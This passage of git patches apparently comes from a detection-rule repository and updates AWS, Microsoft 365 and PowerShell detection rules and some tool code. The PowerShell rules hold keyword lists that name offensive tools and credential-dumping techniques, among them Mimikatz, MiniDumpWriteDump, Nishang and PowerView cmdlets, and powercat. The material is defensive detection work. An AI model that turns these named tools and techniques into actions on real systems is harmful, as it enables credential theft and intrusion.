33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From e6457531dd4af505af7b5b5f85f8800ade3e2b45 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 00:29:29 -0500 Subject: [PATCH 0468/1367] Create m365.yml --- tools/config/generic/m365.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 tools/config/generic/m365.yml diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml new file mode 100644 index 00000000..51e08af6 --- /dev/null +++ b/tools/config/generic/m365.yml @@ -0,0 +1,7 @@ +title: Microsoft 365 Rules +order: 10 +ThreatManagement: + product: m365 + category: ThreatManagement + conditions: + eventSource: SecurityComplianceCenter From f745593e806e7aca2a8ef826344f42825bdc931b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 00:33:42 -0500 Subject: [PATCH 0469/1367] Update microsoft365_potential_ransomware_activity.yml --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index 213f0ee5..818af562 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -17,7 +17,7 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - attack.impact From 853c2eb41d94233419b47d671f37157b9326877c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 01:19:01 -0500 Subject: [PATCH 0470/1367] Update microsoft365_potential_ransomware_activity.yml --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index 818af562..664eae25 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -1,7 +1,7 @@ title: Microsoft 365 - Potential ransomware activity id: bd132164-884a-48f1-aa2d-c6d646b04c69 status: experimental -description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. +description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. author: austinsonger date: 2021/08/19 references: From 4e29dc9c45d8802c81b119d3fc5ca8d06e2e9e28 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 20 Aug 2021 09:06:16 +0200 Subject: [PATCH 0471/1367] fix title --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index 664eae25..a0d99b41 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Potential ransomware activity +title: Microsoft 365 - Potential Ransomware Activity id: bd132164-884a-48f1-aa2d-c6d646b04c69 status: experimental description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. From 4e895da471f221aff0ed5f94db6c622bb00634e3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 20 Aug 2021 09:20:56 +0200 Subject: [PATCH 0472/1367] fix error "has no len()" --- tools/sigma/backends/base.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 08d29b4b..469c0648 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -277,9 +277,10 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) - if len(node.items) == 1: - # A sub expression with length 1 is not a proper sub expression, no self.subExpression required - return generated + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: From f6fe5e7d02e0644c0fb89f51fdee5d5fd8ee8dcc Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 20 Aug 2021 13:58:57 +0200 Subject: [PATCH 0473/1367] fix when backend support error --- tools/sigma/sigma_similarity.py | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/tools/sigma/sigma_similarity.py b/tools/sigma/sigma_similarity.py index ad911c57..68e7d49b 100755 --- a/tools/sigma/sigma_similarity.py +++ b/tools/sigma/sigma_similarity.py @@ -72,10 +72,20 @@ def main(): str(path): SigmaCollectionParser(path.open(encoding='utf-8').read()) for path in paths } - converted = { - str(path): list(sigma_collection.generate(backend)) - for path, sigma_collection in parsed.items() - } + + # converted = { + # str(path): list(sigma_collection.generate(backend)) + # for path, sigma_collection in parsed.items() + # } + converted = {} + for path, sigma_collection in parsed.items(): + try: + value = list(sigma_collection.generate(backend)) + key = str(path) + converted[key] = value + except : + continue #when Raise NotImplementedError: Base backend doesn't support multiple conditions + converted_flat = ( (path, i, normalized) for path, nlist in converted.items() From 7ebd41119087734bb69350637ab43834d77f148f Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 20 Aug 2021 14:22:17 +0200 Subject: [PATCH 0474/1367] update ref from conti_leak --- rules/windows/builtin/win_software_discovery.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index d1c815ee..b68643c6 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml @@ -7,6 +7,7 @@ author: Nikita Nazarov, oscd.community date: 2020/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md + - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna tags: - attack.discovery - attack.t1518 @@ -19,6 +20,7 @@ detection: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 From f09b3ea4b18842866b9f2e007e9340649b275730 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Fri, 20 Aug 2021 13:43:00 +0100 Subject: [PATCH 0475/1367] Update AWS CloudTrail rules aws_ec2_disable_encryption.yml Remove `status: success` from selection criteria, not required aws_ec2_vm_export_failure.yml Remove filter3: ``` eventName: 'ConsoleLogin' responseElements|contains: 'Failure' ``` Incompatible with selection criteria `eventName: 'CreateInstanceExportTask'` aws_ec2_download_userdata.yml, aws_iam_backdoor_users_keys.yml, aws_rds_change_master_password.yml, aws_rds_public_db_restore.yml Update reference aws_sts_assumedrole_misuse.yml Rename to aws_sts_assumerole_misuse.yml Update references to "AssumedRole" to "AssumeRole" Update selection criteria of `userIdentity.sessionContext: Role` to `userIdentity.sessionContext.sessionIssuer.type: Role` --- rules/cloud/aws/aws_ec2_disable_encryption.yml | 3 +-- rules/cloud/aws/aws_ec2_download_userdata.yml | 4 ++-- rules/cloud/aws/aws_ec2_vm_export_failure.yml | 6 ++---- rules/cloud/aws/aws_iam_backdoor_users_keys.yml | 4 ++-- rules/cloud/aws/aws_rds_change_master_password.yml | 4 ++-- rules/cloud/aws/aws_rds_public_db_restore.yml | 4 ++-- ...drole_misuse.yml => aws_sts_assumerole_misuse.yml} | 11 ++++++----- 7 files changed, 17 insertions(+), 19 deletions(-) rename rules/cloud/aws/{aws_sts_assumedrole_misuse.yml => aws_sts_assumerole_misuse.yml} (51%) diff --git a/rules/cloud/aws/aws_ec2_disable_encryption.yml b/rules/cloud/aws/aws_ec2_disable_encryption.yml index ea7330a3..e383c949 100644 --- a/rules/cloud/aws/aws_ec2_disable_encryption.yml +++ b/rules/cloud/aws/aws_ec2_disable_encryption.yml @@ -4,7 +4,7 @@ status: stable description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. author: Sittikorn S date: 2021/06/29 -modified: 2021/08/09 +modified: 2021/08/20 references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: @@ -17,7 +17,6 @@ detection: selection: eventSource: ec2.amazonaws.com eventName: DisableEbsEncryptionByDefault - status: success condition: selection falsepositives: - System Administrator Activities diff --git a/rules/cloud/aws/aws_ec2_download_userdata.yml b/rules/cloud/aws/aws_ec2_download_userdata.yml index 073bdf6b..be6b7438 100644 --- a/rules/cloud/aws/aws_ec2_download_userdata.yml +++ b/rules/cloud/aws/aws_ec2_download_userdata.yml @@ -4,9 +4,9 @@ status: experimental description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. author: faloker date: 2020/02/11 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__download_userdata/main.py#L24 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/ec2__download_userdata/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml index dff7a078..2fed0c66 100644 --- a/rules/cloud/aws/aws_ec2_vm_export_failure.yml +++ b/rules/cloud/aws/aws_ec2_vm_export_failure.yml @@ -4,6 +4,7 @@ status: experimental description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. author: Diogo Braz date: 2020/04/16 +modified: 2021/08/20 references: - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance logsource: @@ -16,10 +17,7 @@ detection: errorMessage: '*' filter2: errorCode: '*' - filter3: - eventName: 'ConsoleLogin' - responseElements|contains: 'Failure' - condition: selection and (filter1 or filter2 or filter3) + condition: selection and (filter1 or filter2) level: low tags: - attack.collection diff --git a/rules/cloud/aws/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml index 2af725c8..7991b3ae 100644 --- a/rules/cloud/aws/aws_iam_backdoor_users_keys.yml +++ b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml @@ -4,9 +4,9 @@ status: experimental description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_users_keys/main.py#L6 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__backdoor_users_keys/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_rds_change_master_password.yml b/rules/cloud/aws/aws_rds_change_master_password.yml index 4204cbaf..cfdfb70a 100644 --- a/rules/cloud/aws/aws_rds_change_master_password.yml +++ b/rules/cloud/aws/aws_rds_change_master_password.yml @@ -4,9 +4,9 @@ status: experimental description: Detects the change of database master password. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_rds_public_db_restore.yml b/rules/cloud/aws/aws_rds_public_db_restore.yml index 41497778..fdc8c19d 100644 --- a/rules/cloud/aws/aws_rds_public_db_restore.yml +++ b/rules/cloud/aws/aws_rds_public_db_restore.yml @@ -4,9 +4,9 @@ status: experimental description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml similarity index 51% rename from rules/cloud/aws/aws_sts_assumedrole_misuse.yml rename to rules/cloud/aws/aws_sts_assumerole_misuse.yml index 2e9d22f4..3bc5af7f 100644 --- a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml @@ -1,9 +1,10 @@ -title: AWS STS AssumedRole Misuse +title: AWS STS AssumeRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 -description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. +description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. author: Austin Songer @austinsonger status: experimental date: 2021/07/24 +modified: 2021/08/20 references: - https://github.com/elastic/detection-rules/pull/1214 - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html @@ -12,8 +13,8 @@ logsource: detection: selection: eventSource: sts.amazonaws.com - eventName: AssumedRole - userIdentity.sessionContext: Role + eventName: AssumeRole + userIdentity.sessionContext.sessionIssuer.type: Role condition: selection level: low tags: @@ -23,5 +24,5 @@ tags: - attack.t1550 - attack.t1550.001 falsepositives: - - AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. From ae368049357d532fca2343edf69ab75310f29deb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:16:48 -0500 Subject: [PATCH 0476/1367] Update microsoft365_user_restricted_from_sending_email.yml --- .../m365/microsoft365_user_restricted_from_sending_email.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml index 355ee3c1..b969efec 100644 --- a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml +++ b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From 360b93635706029072c2a2411905ebcef008aaee Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:17:09 -0500 Subject: [PATCH 0477/1367] Update microsoft365_potential_ransomware_activity.yml --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index a0d99b41..b5571ef9 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From a25f6e196fa1396380b484367f74334171b1ab52 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:17:25 -0500 Subject: [PATCH 0478/1367] Update microsoft365_unusual_volume_of_file_deletion.yml --- .../cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml index 82cea96d..53bbf8ff 100644 --- a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml +++ b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From f037f5b0a928bacc97ebf991e9cbbc0e47103be3 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Fri, 20 Aug 2021 15:42:49 +0100 Subject: [PATCH 0479/1367] Add filter3 back for vm export failure, without consolelogin Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_ec2_vm_export_failure.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml index 2fed0c66..05baed24 100644 --- a/rules/cloud/aws/aws_ec2_vm_export_failure.yml +++ b/rules/cloud/aws/aws_ec2_vm_export_failure.yml @@ -17,7 +17,9 @@ detection: errorMessage: '*' filter2: errorCode: '*' - condition: selection and (filter1 or filter2) + filter3: + responseElements|contains: 'Failure' + condition: selection and (filter1 or filter2 or filter3) level: low tags: - attack.collection From b9a355e3f428906023a78ca6678491890477d0be Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 20 Aug 2021 17:18:32 +0200 Subject: [PATCH 0480/1367] cleanup falsepositives --- rules/cloud/aws/aws_sts_assumerole_misuse.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_sts_assumerole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml index 3bc5af7f..f7464612 100644 --- a/rules/cloud/aws/aws_sts_assumerole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml @@ -24,5 +24,6 @@ tags: - attack.t1550 - attack.t1550.001 falsepositives: - - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. From cb95582077c675b9fc47a389bb93f3cefcbd8ce8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:08:38 +0200 Subject: [PATCH 0481/1367] Update PowerShell rule --- .../powershell_malicious_keywords.yml | 47 ++++++++++--------- ...wershell_nishang_malicious_commandlets.yml | 11 +++-- 2 files changed, 31 insertions(+), 27 deletions(-) diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_malicious_keywords.yml index 03858d39..071f3725 100644 --- a/rules/windows/powershell/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_malicious_keywords.yml @@ -10,33 +10,36 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/08/21 logsource: product: windows service: powershell definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: - keywords: - - "AdjustTokenPrivileges" - - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" - - "Microsoft.Win32.UnsafeNativeMethods" - - "ReadProcessMemory.Invoke" - - "SE_PRIVILEGE_ENABLED" - - "LSA_UNICODE_STRING" - - "MiniDumpWriteDump" - - "PAGE_EXECUTE_READ" - - "SECURITY_DELEGATION" - - "TOKEN_ADJUST_PRIVILEGES" - - "TOKEN_ALL_ACCESS" - - "TOKEN_ASSIGN_PRIMARY" - - "TOKEN_DUPLICATE" - - "TOKEN_ELEVATION" - - "TOKEN_IMPERSONATE" - - "TOKEN_INFORMATION_CLASS" - - "TOKEN_PRIVILEGES" - - "TOKEN_QUERY" - - "Metasploit" - - "Mimikatz" - condition: keywords + Malicious: + EventID: 4104 + ScriptBlockText|contains: + - "AdjustTokenPrivileges" + - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" + - "Microsoft.Win32.UnsafeNativeMethods" + - "ReadProcessMemory.Invoke" + - "SE_PRIVILEGE_ENABLED" + - "LSA_UNICODE_STRING" + - "MiniDumpWriteDump" + - "PAGE_EXECUTE_READ" + - "SECURITY_DELEGATION" + - "TOKEN_ADJUST_PRIVILEGES" + - "TOKEN_ALL_ACCESS" + - "TOKEN_ASSIGN_PRIMARY" + - "TOKEN_DUPLICATE" + - "TOKEN_ELEVATION" + - "TOKEN_IMPERSONATE" + - "TOKEN_INFORMATION_CLASS" + - "TOKEN_PRIVILEGES" + - "TOKEN_QUERY" + - "Metasploit" + - "Mimikatz" + condition: Malicious falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index e8a9ef6c..90b3e7a7 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/07/21 +modified: 2021/08/21 references: - https://github.com/samratashok/nishang tags: @@ -14,10 +14,11 @@ author: Alec Costello logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 + definition: Script block logging must be enabled detection: - keywords: - Payload|contains: + Nishang: + EventID: 4104 + ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions - DNS_TXT_Pwnage @@ -89,7 +90,7 @@ detection: - NotAllNameSpaces - exfill - FakeDC - condition: keywords + condition: Nishang falsepositives: - Penetration testing level: high From 6c529f7ab27c9574da2d5a50dc661714e4d03a00 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:33:52 +0200 Subject: [PATCH 0482/1367] Update PS rules --- .../powershell_clear_powershell_history.yml | 2 +- .../powershell/powershell_ntfs_ads_access.yml | 20 +++++++++++-------- .../powershell/powershell_powercat.yml | 1 + ...rshell_powerview_malicious_commandlets.yml | 6 +++--- .../powershell_prompt_credentials.yml | 7 +++---- .../powershell/powershell_psattack.yml | 8 ++++---- .../powershell_remote_powershell_session.yml | 1 + .../powershell/powershell_shellcode_b64.yml | 2 +- ...shell_shellintel_malicious_commandlets.yml | 5 +++-- 9 files changed, 29 insertions(+), 23 deletions(-) diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index e937037d..ff01b153 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_ntfs_ads_access.yml index 9ee13a9f..0d38b0d7 100644 --- a/rules/windows/powershell/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_ntfs_ads_access.yml @@ -13,18 +13,22 @@ tags: - attack.t1086 # an old one author: Sami Ruohonen date: 2018/07/24 -modified: 2020/08/24 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script block logging must be enabled detection: - keyword1: - - "set-content" - - "add-content" - keyword2: - - "-stream" - condition: keyword1 and keyword2 + event: + EventID: 4104 + content: + ScriptBlockText|contains: + - "set-content" + - "add-content" + stream: + ScriptBlockText|contains: + - "-stream" + condition: all of them falsepositives: - unknown level: high diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index 553a8059..c4c5cb0c 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -31,6 +31,7 @@ detection: logsource: product: windows service: powershell + definition: Module Logging must be enable detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml index b98fbb4c..1b2b7454 100644 --- a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: dcd74b95-3f36-4ed9-9598-0490951643aa status: experimental description: Detects Commandlet names from PowerView of PowerSploit exploitation framework. date: 2021/05/18 -modified: 2021/07/02 +modified: 2021/08/21 references: - https://powersploit.readthedocs.io/en/stable/Recon/README - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon @@ -16,11 +16,11 @@ author: Bhabesh Raj logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 - ScriptBlockText: + ScriptBlockText|contains: - Export-PowerViewCSV - Get-IPAddress - Resolve-IPAddress diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_prompt_credentials.yml index 8ef73b44..b3d5e713 100644 --- a/rules/windows/powershell/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_prompt_credentials.yml @@ -16,13 +16,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 - keyword: ScriptBlockText|contains: 'PromptForCredential' - condition: all of them -falsepositives: + condition: selection +falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_psattack.yml index 0b3d4167..78690987 100644 --- a/rules/windows/powershell/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_psattack.yml @@ -10,15 +10,15 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script block logging must be enabled detection: selection: - EventID: 4103 - keyword: - - 'PS ATTACK!!!' + EventID: 4104 + ScriptBlockText|contains: 'PS ATTACK!!!' condition: all of them falsepositives: - Pentesters diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 3e345947..237c546b 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -22,6 +22,7 @@ level: high logsource: product: windows service: powershell + definition: Module Logging must be enable and fields have to be extract from event detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_shellcode_b64.yml index ba269aca..45ea2909 100644 --- a/rules/windows/powershell/powershell_shellcode_b64.yml +++ b/rules/windows/powershell/powershell_shellcode_b64.yml @@ -17,7 +17,7 @@ modified: 2020/12/01 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml index e65c3c23..62dfb25f 100644 --- a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml @@ -3,6 +3,7 @@ id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 status: experimental description: Detects Commandlet names from ShellIntel exploitation scripts. date: 2021/08/09 +modified: 2021/08/21 references: - https://github.com/Shellntel/scripts/ tags: @@ -12,11 +13,11 @@ author: Max Altgelt, Tobias Michalski logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 - ScriptBlockText: + ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks - Out-Minidump From da839775fe800c41fed9eea420b290a142368675 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:50:59 +0200 Subject: [PATCH 0483/1367] Update PS rules --- .../sysmon_suspicious_powershell_profile_create.yml} | 0 .../powershell/powershell_CL_Invocation_LOLScript.yml | 2 +- .../powershell/powershell_CL_Invocation_LOLScript_v2.yml | 2 +- .../powershell/powershell_CL_Mutexverifiers_LOLScript.yml | 2 +- rules/windows/powershell/powershell_accessing_win_api.yml | 2 +- rules/windows/powershell/powershell_adrecon_execution.yml | 2 +- .../windows/powershell/powershell_automated_collection.yml | 2 +- rules/windows/powershell/powershell_bad_opsec_artifacts.yml | 2 +- rules/windows/powershell/powershell_decompress_commands.yml | 2 +- rules/windows/powershell/powershell_get_clipboard.yml | 2 +- .../powershell/powershell_invoke_obfuscation_clip+.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell/powershell_invoke_obfuscation_stdin+.yml | 2 +- .../powershell/powershell_invoke_obfuscation_var+.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell/powershell_invoke_obfuscation_via_rundll.yml | 2 +- 